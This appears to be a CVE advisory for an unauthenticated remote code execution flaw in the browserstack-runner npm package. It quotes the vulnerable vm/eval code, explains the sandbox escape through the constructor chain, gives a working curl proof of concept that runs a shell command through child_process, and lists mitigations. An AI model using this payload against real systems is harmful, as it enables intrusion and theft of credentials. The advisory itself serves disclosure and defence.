BrowserStack Runner, Code Injection, CVE-2026-49143 (High) -DC-Jun2026-202


Technical Analysis of CVE-2026-49143

CVE-2026-49143 is a high-severity code injection vulnerability in the `browserstack-runner` npm package, affecting versions up to and including 0.9.5. The flaw lies in the HTTP handler for the `/_log` endpoint, located in `lib/server.js` at lines 491–515. When `browserstack-runner` starts, it creates an HTTP server on port 8888 (configurable) that listens on all network interfaces (`0.0.0.0`), so any host that can reach the machine on that port can reach the endpoint.
The `/_log` endpoint accepts POST requests and processes the JSON body. The vulnerable code is as follows:

var vm = require('vm'), util = require('util');
var query = JSON.parse(body); // parsed JSON body of the POST; `arguments` is attacker-controlled
// Vulnerable as shipped in 0.9.5: the host's util.format is placed inside the vm context
var context = { input: query.arguments, format: util.format, output: '' };
var tryEvalOrString = 'function (arg) { try { return eval(\'o = \' + arg); } catch (e) { return arg; } }';
vm.runInNewContext('output = format.apply(null, input.map(' + tryEvalOrString + '));', context);

This code takes the user-supplied `arguments` array from the JSON request and passes it into a Node.js VM context via `vm.runInNewContext()`, where each element is run through `eval()`. The Node.js documentation explicitly states that the `vm` module is not a security mechanism, yet the code treats it as one.
The `context` object includes a reference to `util.format`, which is a host-context Function. Attackers can leverage this to break out of the sandbox by using `this.constructor.constructor("return process")()` to gain access to the host process. Unlike the `/_progress` and `/_report` handlers, which verify worker UUID authentication, the `/_log` handler has no authentication checks. This allows an attacker to craft a JSON request that executes arbitrary system commands on the host machine. The attack window exists for the duration of the test run, typically 1–15 minutes, but during this time an attacker can fully compromise the system, including reading the BrowserStack access key from environment variables.

DailyCVE Form:

Platform: browserstack-runner
Version: 0.9.5
Vulnerability: Unauthenticated RCE
Severity: High (8.7)
Date: 2026-06-02

Prediction: 2026-06-15

What Undercode Say

# Install and run vulnerable version
npm install -g browserstack-runner@0.9.5
# Create minimal test files
echo '<html><body>t</body></html>' > t.html
echo '{"username":"X","key":"X","test_path":"t.html","test_framework":"qunit","browsers":[]}' > browserstack.json
# Start the runner
node bin/runner.js
# Exploit command (Terminal 2)
curl -s http://127.0.0.1:8888/_log \
  -H "Content-Type: application/json" \
  -d '{"arguments":["this.constructor.constructor(\"return process.mainModule.require(`child_process`).execSync(`id`).toString()\")()"]}'

Output demonstrates successful arbitrary command execution (`uid=1000(user) …`).

Exploit

The exploit works by walking the constructor chain of a host-context object. The attacker injects a payload as the `arguments` array in the JSON body. The payload `this.constructor.constructor("return process.mainModule.require('child_process').execSync('id').toString()")()` leverages the host-context `Function` reference reachable through `util.format` to escape the VM context. From there, `process.mainModule.require('child_process').execSync()` executes arbitrary system commands. The result is stored in the `output` field of the `context` object, which is then sent back to the attacker in the HTTP response.

Protection

Short-term (Mitigation): Restrict network access to the vulnerable `/_log` endpoint using firewall rules or network segmentation to prevent unauthenticated access.

Long-term (Remediation):

1. Remove `eval()` and `vm.runInNewContext()` from the `/_log` handler entirely. Use `JSON.stringify()` to render log arguments instead.
2. Implement worker UUID authentication for the `/_log` handler, matching the pattern used by `/_progress` and `/_report`.
3. Reconfigure the HTTP server to listen only on `127.0.0.1` instead of `0.0.0.0`.
4. Do not use the Node.js `vm` module or `eval()` to process user-controlled input anywhere in the code base.

Impact

CVE-2026-49143 has a CVSS v4.0 score of 8.7 (High) with the vector CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. The attack vector is adjacent network, meaning an attacker must be on the same network segment as the developer running the vulnerable tool. The attack complexity is Low, requires no privileges or user interaction, and results in total loss of confidentiality, integrity, and availability (High impact on the vulnerable system). The presence of a public Proof-of-Concept (PoC) exploit makes this vulnerability a significant risk for any developer or CI/CD environment using browserstack-runner. The attack window, though limited to the duration of a test run (typically 1–15 minutes), offers a full system compromise, including access to any credentials (e.g., BrowserStack access keys) present in the environment.


Sources:

Reported By: github.com